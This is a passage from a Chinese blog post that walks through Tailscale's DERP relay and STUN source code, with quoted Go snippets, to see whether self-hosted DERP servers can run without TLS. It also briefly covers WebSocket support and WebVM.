(2023/11/11)，git commit 为 <a href="https://github.com/tailscale/tailscale/commit/86c8ab7502a38b4de05308355fe0c847e4e78167">86c8ab75.</a></p></blockquote><h3 id="1-DERP-配置相关">1. DERP 配置相关</h3><p>DERP 的顶层实现主要由两个文件组成</p><ul><li><a href="https://github.com/tailscale/tailscale/blob/86c8ab75/cmd/derper/derper.go">cmd/derper/derper.go</a>：DERP 服务器的顶层入口，包括监听 STUN 服务的过程逻辑全在这里</li><li><a href="https://github.com/tailscale/tailscale/blob/86c8ab75/derp/derp_server.go">derp/derp_server.go</a>：中继转发数据的相关操作类代码</li></ul><p>从 DERP 服务器的代码中可以收获一些有意思的东西：</p><ol><li><p>DERP 服务器可以同时运行两个服务，一个是使用 <strong>HTTP/HTTPS</strong>（TCP 协议）的 DERP 数据中转服务；另一个是使用 UDP 协议的 STUN 打洞服务。</p><blockquote><p>这俩服务刚好使用了不同的运输层协议，所以应该可以把 Zerotier 那套机制拿过来用。</p></blockquote></li><li><p>所绑定的 IP、HTTP/HTTPS（DERP 服务） 监听端口、选择指定 HTTP 还是 HTTPS 协议、以及 STUN 监听端口都是可配置的，灵活性很好。</p></li><li><p>可以指定参数 <code>verify-clients</code> 来限制使用当前 DERP 服务的只能是自己的 tailscale 节点，防止白嫖。不过启用该服务需要当前 DERP 服务器本身就是一个 tailscale 节点，或者存在 socket 文件 <code>/var/run/tailscale/tailscaled.sock</code>。</p></li></ol><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// cmd/derper/derper.go</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> (</span><br><span class="line">dev        = flag.Bool(<span class="string">&quot;dev&quot;</span>, <span class="literal">false</span>, <span class="string">&quot;run in localhost development mode (overrides -a)&quot;</span>)</span><br><span class="line">addr       = flag.String(<span class="string">&quot;a&quot;</span>, <span class="string">&quot;:443&quot;</span>, <span class="string">&quot;server HTTP/HTTPS listen address, in form \&quot;:port\&quot;, \&quot;ip:port\&quot;, or for IPv6 \&quot;[ip]:port\&quot;. If the IP is omitted, it defaults to all interfaces. Serves HTTPS if the port is 443 and/or -certmode is manual, otherwise HTTP.&quot;</span>)</span><br><span class="line">httpPort   = flag.Int(<span class="string">&quot;http-port&quot;</span>, <span class="number">80</span>, <span class="string">&quot;The port on which to serve HTTP. Set to -1 to disable. The listener is bound to the same IP (if any) as specified in the -a flag.&quot;</span>)</span><br><span class="line">stunPort   = flag.Int(<span class="string">&quot;stun-port&quot;</span>, <span class="number">3478</span>, <span class="string">&quot;The UDP port on which to serve STUN. The listener is bound to the same IP (if any) as specified in the -a flag.&quot;</span>)</span><br><span class="line">configPath = flag.String(<span class="string">&quot;c&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;config file path&quot;</span>)</span><br><span class="line">certMode   = flag.String(<span class="string">&quot;certmode&quot;</span>, <span class="string">&quot;letsencrypt&quot;</span>, <span class="string">&quot;mode for getting a cert. possible options: manual, letsencrypt&quot;</span>)</span><br><span class="line">certDir    = flag.String(<span class="string">&quot;certdir&quot;</span>, tsweb.DefaultCertDir(<span class="string">&quot;derper-certs&quot;</span>), <span class="string">&quot;directory to store LetsEncrypt certs, if addr&#x27;s port is :443&quot;</span>)</span><br><span class="line">hostname   = flag.String(<span class="string">&quot;hostname&quot;</span>, <span class="string">&quot;derp.tailscale.com&quot;</span>, <span class="string">&quot;LetsEncrypt host name, if addr&#x27;s port is :443&quot;</span>)</span><br><span class="line">runSTUN    = flag.Bool(<span class="string">&quot;stun&quot;</span>, <span class="literal">true</span>, <span class="string">&quot;whether to run a STUN server. It will bind to the same IP (if any) as the --addr flag value.&quot;</span>)</span><br><span class="line">runDERP    = flag.Bool(<span class="string">&quot;derp&quot;</span>, <span class="literal">true</span>, <span class="string">&quot;whether to run a DERP server. The only reason to set this false is if you&#x27;re decommissioning a server but want to keep its bootstrap DNS functionality still running.&quot;</span>)</span><br><span class="line"></span><br><span class="line">meshPSKFile    = flag.String(<span class="string">&quot;mesh-psk-file&quot;</span>, defaultMeshPSKFile(), <span class="string">&quot;if non-empty, path to file containing the mesh pre-shared key file. It should contain some hex string; whitespace is trimmed.&quot;</span>)</span><br><span class="line">meshWith       = flag.String(<span class="string">&quot;mesh-with&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;optional comma-separated list of hostnames to mesh with; the server&#x27;s own hostname can be in the list&quot;</span>)</span><br><span class="line">bootstrapDNS   = flag.String(<span class="string">&quot;bootstrap-dns-names&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;optional comma-separated list of hostnames to make available at /bootstrap-dns&quot;</span>)</span><br><span class="line">unpublishedDNS = flag.String(<span class="string">&quot;unpublished-bootstrap-dns-names&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;optional comma-separated list of hostnames to make available at /bootstrap-dns and not publish in the list&quot;</span>)</span><br><span class="line">verifyClients  = flag.Bool(<span class="string">&quot;verify-clients&quot;</span>, <span class="literal">false</span>, <span class="string">&quot;verify clients to this DERP server through a local tailscaled instance.&quot;</span>)</span><br><span class="line"></span><br><span class="line">acceptConnLimit = flag.Float64(<span class="string">&quot;accept-connection-limit&quot;</span>, math.Inf(+<span class="number">1</span>), <span class="string">&quot;rate limit for accepting new connection&quot;</span>)</span><br><span class="line">acceptConnBurst = flag.Int(<span class="string">&quot;accept-connection-burst&quot;</span>, math.MaxInt, <span class="string">&quot;burst limit for accepting new connection&quot;</span>)</span><br><span class="line">)</span><br></pre></td></tr></table></figure><p>这些信息说明 DERP 的可配置性很高，且对 TLS 的要求是可选的。不过<strong>只知道 DERP 服务可以选择开启 HTTP 协议还不够用，我们还需要看看各个客户端节点是如何配置与使用 DERP 服务的，因为假如客户端节点强制启用 TLS 访问 DERP 服务，那即便关掉 DERP 服务的 TLS 也无济于事</strong>。</p><blockquote><p>http-port 参数只会在启用了 HTTPS 服务后，才会尝试监听新的 HTTP 服务（<a href="https://github.com/tailscale/tailscale/blob/86c8ab75/cmd/derper/derper.go#L284">cmd/derper/derper.go#L284</a>）。这意味着 <strong>HTTP 服务实际上不是必须的</strong>，官方文档里所提出的要求存在冗余。</p></blockquote><h3 id="2-DERP-Client-配置相关">2. DERP Client 配置相关</h3><p>代码 <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/tailcfg/derpmap.go#L112">tailcfg/derpmap.go</a> 展现了下发至 client 上关于 derp 服务的配置信息：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// tailcfg/derpmap.go</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// DERPNode describes a DERP packet relay node running within a DERPRegion.</span></span><br><span class="line"><span class="keyword">type</span> DERPNode <span class="keyword">struct</span> &#123;</span><br><span class="line"><span class="comment">// Name is a unique node name (across all regions).</span></span><br><span class="line"><span class="comment">// It is not a host name.</span></span><br><span class="line"><span class="comment">// It&#x27;s typically of the form &quot;1b&quot;, &quot;2a&quot;, &quot;3b&quot;, etc. (region</span></span><br><span class="line"><span class="comment">// ID + suffix within that region)</span></span><br><span class="line">Name <span class="type">string</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// RegionID is the RegionID of the DERPRegion that this node</span></span><br><span class="line"><span class="comment">// is running in.</span></span><br><span class="line">RegionID <span class="type">int</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// HostName is the DERP node&#x27;s hostname.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// It is required but need not be unique; multiple nodes may</span></span><br><span class="line"><span class="comment">// have the same HostName but vary in configuration otherwise.</span></span><br><span class="line">HostName <span class="type">string</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// CertName optionally specifies the expected TLS cert common</span></span><br><span class="line"><span class="comment">// name. If empty, HostName is used. If CertName is non-empty,</span></span><br><span class="line"><span class="comment">// HostName is only used for the TCP dial (if IPv4/IPv6 are</span></span><br><span class="line"><span class="comment">// not present) + TLS ClientHello.</span></span><br><span class="line">CertName <span class="type">string</span> <span class="string">`json:&quot;,omitempty&quot;`</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// IPv4 optionally forces an IPv4 address to use, instead of using DNS.</span></span><br><span class="line"><span class="comment">// If empty, A record(s) from DNS lookups of HostName are used.</span></span><br><span class="line"><span class="comment">// If the string is not an IPv4 address, IPv4 is not used; the</span></span><br><span class="line"><span class="comment">// conventional string to disable IPv4 (and not use DNS) is</span></span><br><span class="line"><span class="comment">// &quot;none&quot;.</span></span><br><span class="line">IPv4 <span class="type">string</span> <span class="string">`json:&quot;,omitempty&quot;`</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// IPv6 optionally forces an IPv6 address to use, instead of using DNS.</span></span><br><span class="line"><span class="comment">// If empty, AAAA record(s) from DNS lookups of HostName are used.</span></span><br><span class="line"><span class="comment">// If the string is not an IPv6 address, IPv6 is not used; the</span></span><br><span class="line"><span class="comment">// conventional string to disable IPv6 (and not use DNS) is</span></span><br><span class="line"><span class="comment">// &quot;none&quot;.</span></span><br><span class="line">IPv6 <span class="type">string</span> <span class="string">`json:&quot;,omitempty&quot;`</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// Port optionally specifies a STUN port to use.</span></span><br><span class="line"><span class="comment">// Zero means 3478.</span></span><br><span class="line"><span class="comment">// To disable STUN on this node, use -1.</span></span><br><span class="line">STUNPort <span class="type">int</span> <span class="string">`json:&quot;,omitempty&quot;`</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// STUNOnly marks a node as only a STUN server and not a DERP</span></span><br><span class="line"><span class="comment">// server.</span></span><br><span class="line">STUNOnly <span class="type">bool</span> <span class="string">`json:&quot;,omitempty&quot;`</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// DERPPort optionally provides an alternate TLS port number</span></span><br><span class="line"><span class="comment">// for the DERP HTTPS server.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// If zero, 443 is used.</span></span><br><span class="line">DERPPort <span class="type">int</span> <span class="string">`json:&quot;,omitempty&quot;`</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// InsecureForTests is used by unit tests to disable TLS verification.</span></span><br><span class="line"><span class="comment">// It should not be set by users.</span></span><br><span class="line">InsecureForTests <span class="type">bool</span> <span class="string">`json:&quot;,omitempty&quot;`</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// STUNTestIP is used in tests to override the STUN server&#x27;s IP.</span></span><br><span class="line"><span class="comment">// If empty, it&#x27;s assumed to be the same as the DERP server.</span></span><br><span class="line">STUNTestIP <span class="type">string</span> <span class="string">`json:&quot;,omitempty&quot;`</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// CanPort80 specifies whether this DERP node is accessible over HTTP</span></span><br><span class="line"><span class="comment">// on port 80 specifically. This is used for captive portal checks.</span></span><br><span class="line">CanPort80 <span class="type">bool</span> <span class="string">`json:&quot;,omitempty&quot;`</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>我们既可以指定客户端在连接 DERP 服务器时所使用<strong>关于 DERP 服务和 STUN 服务的监听端口</strong>，也可以通过测试用的参数来让客户端在连接 DERP 服务器时<strong>指定是否启用 TLS 验证（即指定是否使用 TLS 证书）</strong>。管中窥豹，看上去好像客户端这块可配置性也比较强。</p><blockquote><p>不过注意：从 DERP Client 的配置文件只能看出<strong>可以尝试用 TLS-Insecure 来连接 DERP 服务器的 HTTPS 服务</strong>，<strong>并没有说明可以直接连接 DERP 服务器的 HTTP 服务</strong>。这个需要继续探究。</p></blockquote><h3 id="3-DERP-服务连接逻辑">3. DERP 服务连接逻辑</h3><p>那么 tailscale 节点是如何实际与 DERP 服务器进行交互的呢？需要关注这三个文件，层次依次从高到低：</p><ul><li><a href="https://github.com/tailscale/tailscale/blob/86c8ab75/wgengine/magicsock/magicsock.go">wgengine/magicsock/magicsock.go</a>：关键函数 <code>sendAddr</code> 支持向 DERP 服务器或直连 peer 发送单个数据包。该文件整体上提供了更新 endpoints、维护网络状态、发送与接收数据包的顶层实现、打洞路径探索等更为高层的功能特性。</li><li><a href="https://github.com/tailscale/tailscale/blob/86c8ab75/wgengine/magicsock/derp.go#L256">wgengine/magicsock/derp.go</a>：该文件中的关键主要函数为 <code>derpWriteChanOfAddr</code>，创建与单个 DERP 服务器的复杂连接，并进行信息(message) 处理。</li><li><a href="https://github.com/tailscale/tailscale/blob/86c8ab75/derp/derphttp/derphttp_client.go">derp/derphttp/derphttp_client.go</a>：实现了底层与 DERP 服务器实际监听、连接、发送与接收数据(data) 等底层操作。</li></ul><blockquote><p>这些文件里面内容较多，就不细讲了，自己看看会更能感受到其中的内在精妙。</p></blockquote><p>我们主要关注的是最后一个文件，因为底层操作才是影响我们能否用 non-TLS 协议创建连接的关键位置（即 HTTP 协议，毕竟要是能走 HTTP，那就没必要走<strong>关闭证书验证的伪 HTTPS 协议</strong>） 。</p><p>正常情况下，tailscale 都只会与同个 Region 中的其中一个节点进行连接和通信，即便单个 Region 里存在多个冗余节点，tailscale 也只会连接其中一个：</p><ol><li><p>客户端<strong>尝试创建</strong> DERP Region Client：derpWriteChanOfAddr 函数 - <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/wgengine/magicsock/derp.go#L321">wgengine/magicsock/derp.go#L321</a></p></li><li><p><strong>实际创建</strong> DERP Region 的 Client 结构体：NewRegionClient 函数 - <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/derp/derphttp/derphttp_client.go#L109">derp/derphttp/derphttp_client.go#L109</a></p></li><li><p>客户端向 DERP Region 发起连接，<strong>获取 TCP 连接（注意不是 TLS 连接）</strong>：dialRegion 函数 - <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/derp/derphttp/derphttp_client.go#L570">derp/derphttp/derphttp_client.go#L570</a></p></li><li><p>在获取 DERP Region 的 TCP 连接后，根据条件判断选择是否使用 HTTPS 协议：<a href="https://github.com/tailscale/tailscale/blob/86c8ab75/derp/derphttp/derphttp_client.go#L392">derp/derphttp/derphttp_client.go#L392</a> &amp; <a href="https://github.com/tailscale/tailscale/blob/86c8ab75/derp/derphttp/derphttp_client.go#L426">derp/derphttp/derphttp_client.go#L426</a></p><blockquote><p>以下代码先走 switch-case 的 <strong>default 分支</strong>，之后进入 <code>c.useHTTPS()</code> 语句判断当前是否使用 HTTPS 协议进行连接。</p></blockquote> <figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="params">(c *Client)</span></span> connect(ctx context.Context, caller <span class="type">string</span>) (client *derp.Client, connGen <span class="type">int</span>, err <span class="type">error</span>) &#123;</span><br><span class="line">...</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> node *tailcfg.DERPNode <span class="comment">// nil when using c.url to dial</span></span><br><span class="line"><span class="keyword">switch</span> &#123;</span><br><span class="line"><span class="keyword">case</span> useWebsockets():</span><br><span class="line">...</span><br><span class="line"><span class="keyword">case</span> c.url != <span class="literal">nil</span>:</span><br><span class="line">c.logf(<span class="string">&quot;%s: connecting to %v&quot;</span>, caller, c.url)</span><br><span class="line">tcpConn, err = c.dialURL(ctx)</span><br><span class="line"><span class="keyword">default</span>:</span><br><span class="line">c.logf(<span class="string">&quot;%s: connecting to derp-%d (%v)&quot;</span>, caller, reg.RegionID, reg.RegionCode)</span><br><span class="line">tcpConn, node, err = c.dialRegion(ctx, reg)</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line"><span class="keyword">return</span> <span class="literal">nil</span>, <span class="number">0</span>, err</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">...</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> httpConn net.Conn        <span class="comment">// a TCP conn or a TLS conn; what we speak HTTP to</span></span><br><span class="line"><span class="keyword">var</span> serverPub key.NodePublic <span class="comment">// or zero if unknown (if not using TLS or TLS middlebox eats it)</span></span><br><span class="line"><span class="keyword">var</span> serverProtoVersion <span class="type">int</span></span><br><span class="line"><span class="keyword">var</span> tlsState *tls.ConnectionState</span><br><span class="line"><span class="keyword">if</span> c.useHTTPS() &#123;</span><br><span class="line">tlsConn := c.tlsClient(tcpConn, node)</span><br><span class="line">httpConn = tlsConn</span><br><span class="line"></span><br><span class="line"><span class="comment">// Force a handshake now (instead of waiting for it to</span></span><br><span class="line"><span class="comment">// be done implicitly on read/write) so we can check</span></span><br><span class="line"><span class="comment">// the ConnectionState.</span></span><br><span class="line"><span class="keyword">if</span> err := tlsConn.Handshake(); err != <span class="literal">nil</span> &#123;</span><br><span class="line"><span class="keyword">return</span> <span class="literal">nil</span>, <span class="number">0</span>, err</span><br><span class="line">&#125;</span><br><span class="line">...</span><br><span class="line">&#125;</span><br><span class="line">...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ol><p><code>Client.useHTTPS</code> 函数就是客户端用来判断连接 DERP 服务器时是否需要使用 HTTPS 协议，从下面的代码中可以得知，当客户端连接 DERP 服务器时，<strong>它几乎一定会使用 HTTPS 协议</strong>。很简单，因为 <strong>DERP Region Client 的 url 字段是空的</strong>，除非启动调试参数，否则它就会使用 HTTPS。</p><blockquote><p>手动在运行 DERP 服务时启用调试参数/修改源代码是比较 dirty 的，个人不太倾向这种操作，尽量能不改代码就尽量不改代码。因此这里我选择启用 HTTPS 协议算了。</p></blockquote><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// derp/derphttp/derphttp_client.go</span></span><br><span class="line"><span class="comment">// --------------------------------</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// Client is a DERP-over-HTTP client.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// It automatically reconnects on error retry. That is, a failed Send or</span></span><br><span class="line"><span class="comment">// Recv will report the error and not retry, but subsequent calls to</span></span><br><span class="line"><span class="comment">// Send/Recv will completely re-establish the connection (unless Close</span></span><br><span class="line"><span class="comment">// has been called).</span></span><br><span class="line"><span class="keyword">type</span> Client <span class="keyword">struct</span> &#123;</span><br><span class="line">...</span><br><span class="line"></span><br><span class="line"><span class="comment">// Either url or getRegion is non-nil:</span></span><br><span class="line">url       *url.URL</span><br><span class="line">getRegion <span class="function"><span class="keyword">func</span><span class="params">()</span></span> *tailcfg.DERPRegion</span><br><span class="line"></span><br><span class="line">...</span><br><span class="line">&#125;</span><br><span class="line">...</span><br><span class="line"></span><br><span class="line"><span class="comment">// debugDERPUseHTTP tells clients to connect to DERP via HTTP on port</span></span><br><span class="line"><span class="comment">// 3340 instead of HTTPS on 443.</span></span><br><span class="line"><span class="keyword">var</span> debugUseDERPHTTP = envknob.RegisterBool(<span class="string">&quot;TS_DEBUG_USE_DERP_HTTP&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="params">(c *Client)</span></span> useHTTPS() <span class="type">bool</span> &#123;</span><br><span class="line"><span class="keyword">if</span> c.url != <span class="literal">nil</span> &amp;&amp; c.url.Scheme == <span class="string">&quot;http&quot;</span> &#123;</span><br><span class="line"><span class="keyword">return</span> <span class="literal">false</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> debugUseDERPHTTP() &#123;</span><br><span class="line"><span class="keyword">return</span> <span class="literal">false</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">return</span> <span class="literal">true</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>那么现在下结论：<strong>在正常情况下，DERP 中继服务一定走（可以不经过 TLS 验证的）HTTPS 协议</strong>。</p><p>顺带讲一下 <code>derphttp.Client</code> 中 url 字段能否为 <code>http</code>。唯一一个<strong>创建带有 url 字段 Client 结构的函数</strong>的调用点如下，从中可以看到，URL 的 scheme 已经被限制死为 <strong>https</strong> 了，这个功能应该是给 tailscale 官方域名使用，因此对我们来讲用处其实不大：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// cmd/derper/mesh.go</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">startMeshWithHost</span><span class="params">(s *derp.Server, host <span class="type">string</span>)</span></span> <span class="type">error</span> &#123;</span><br><span class="line">logf := logger.WithPrefix(log.Printf, fmt.Sprintf(<span class="string">&quot;mesh(%q): &quot;</span>, host))</span><br><span class="line">c, err := derphttp.NewClient(s.PrivateKey(), <span class="string">&quot;https://&quot;</span>+host+<span class="string">&quot;/derp&quot;</span>, logf)</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line"><span class="keyword">return</span> err</span><br><span class="line">&#125;</span><br><span class="line">...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="4-WebSocket">4. WebSocket</h3><p>我在阅读 DERP 代码时，发现它也支持中继 websocket 流量，这引起了我的好奇。</p><p>在最初的时候，我以为 DERP 是通过 HTTPS 的 websocket 来中继流量。但经过一番消息查阅和代码阅读，发现事情其实并非这样，而是 <strong>tailscale 也支持 p2p 的 websocket 通信</strong>。</p><p>开发者尝试让 Tailscale 可以运行在浏览器中，这个就有点意思了。那么目前有哪些有意思的浏览器项目可以和 Tailscale 结合呢？我发现了这个 - <a href="https://labs.leaningtech.com/blog/webvm-virtual-machine-with-networking-via-tailscale">How we added full networking to WebVM via Tailscale</a></p><p>一句话描述：<strong>WebVM 是一个运行在浏览器中的小且精的 Linux VM，tailscale 和 WebVM 一拍即合使得我们可以在浏览器中通过 WebVM 直接访问我们的 tailscale 网络</strong>。</p><p>这个东西极大的引起了我的好奇心，因为我一直在想要不要单独给机器暴露一个端口用来搭建 Web ssh，以便于在陌生机器上仍然能够访问我的 tailscale 网络。</p><p>而现在，我便可以通过浏览器上的 WebVM，使用 ssh 连接进远程机器进行操作，完美满足我的要求，非常的 nice。</p><p>截一个使用示例，非常的有趣。WebVM 地址为 <a href="https://webvm.io/">https://webvm.io/</a></p><p><img src="/2023/11/tailscale-derp/Untitled.png" alt="Untitled"></p><p>在 WebVM 会话存活时， tailscale 网络中会临时加入这台 VM，在该会话死亡时自动从 tailscale 网络中清除：</p><p><img src="/2023/11/tailscale-derp/Untitled%201.png" alt="Untitled"></p><p>但比较悲伤的是，WebVM 中的 tailscale 还不太支持 MagicDNS，也就是说得手输入 IP 地址连接远程机器了，没法用主机名。</p><h3 id="5-STUN-服务">5. STUN 服务</h3><p>STUN 是用来进行 NAT 检测的服务。理论上说，将 STUN 放到与两台 peer 越近的位置越好，因为这能减少 NAT穿透的层数。但 <strong>STUN 原始协议</strong>要求 STUN server <strong>至少拥有两个公网 IP</strong> 才能做到非常完备的 NAT 协议检测，因为两个公网 IP 可以让 STUN server 有两个流量出站口，便于模拟出“两台”设备来更好的检测 peer 的 NAT 类型。</p><p>但这种条件未免过于苛刻，一个公网 IP 都不太容易拿到，更何况是两个公网 IP，而且还得是<strong>两个公网 IP 都绑定在一个设备</strong>上，难上加难。不过好消息是 Tailscale 的 stun 并不需要这么高的要求，它的 STUN UDP 服务只做一件事：接受 <strong>peer 的 UDP 连接，并告诉 Peer 当前所看到 NAT 的 IP:Port 对:</strong></p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// cmd/derper/derper.go</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">serverSTUNListener</span><span class="params">(ctx context.Context, pc *net.UDPConn)</span></span> &#123;</span><br><span class="line">...</span><br><span class="line"><span class="keyword">for</span> &#123;</span><br><span class="line"><span class="comment">// 1. 从 UDP 连接中读取 pkt</span></span><br><span class="line">n, ua, err = pc.ReadFromUDP(buf[:])</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">...</span><br><span class="line"><span class="keyword">continue</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 2. 将 pkt 解析成 txid，主要是防止消息错位</span></span><br><span class="line">pkt := buf[:n]</span><br><span class="line">...</span><br><span class="line">txid, err := stun.ParseBindingRequest(pkt)</span><br><span class="line">...</span><br><span class="line"><span class="comment">// 3. 将 Server 从 UDP 连接中看到的公网 IP:Port，与 txid 打包发回给 client</span></span><br><span class="line">addr, _ := netip.AddrFromSlice(ua.IP)</span><br><span class="line">res := stun.Response(txid, netip.AddrPortFrom(addr, <span class="type">uint16</span>(ua.Port)))</span><br><span class="line">_, err = pc.WriteTo(res, ua)</span><br><span class="line">...</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>这里的 STUN 服务非常简单，它只做了整个 NAT 检测中最简单的一环，那就是<strong>告诉 client 来自 server 的公网视角</strong>。</p><p>但打洞没有这么简单，<strong>Tailscale 还会基于 DERP 服务的 discovery message 旁路信道 + 其他 NAT 检测的黑科技来做 NAT 穿越</strong>。</p><p>这里就得插一个 Tailscale blog 链接了，最好是点进去看：<a href="https://tailscale.com/blog/how-nat-traversal-works/">How NAT traversal works NAT - Tailscale Blog</a>，不过我更推荐看这个译文：<a href="https://arthurchiao.art/blog/how-nat-traversal-works-zh/">[译] NAT 穿透是如何工作的：技术原理及企业级实践（Tailscale, 2020）- arthurchiao’s blog</a>，讲的非常的通俗易懂。</p><p>这里不打算介绍 Tailscale 打洞的一整套逻辑，因为关注点还是在于建立 DERP 服务，具体细节可以看上面的文章，而且因为过于黑科技以至于想简短讲完不太可能。不过在这里提到了 STUN 服务只是想说明 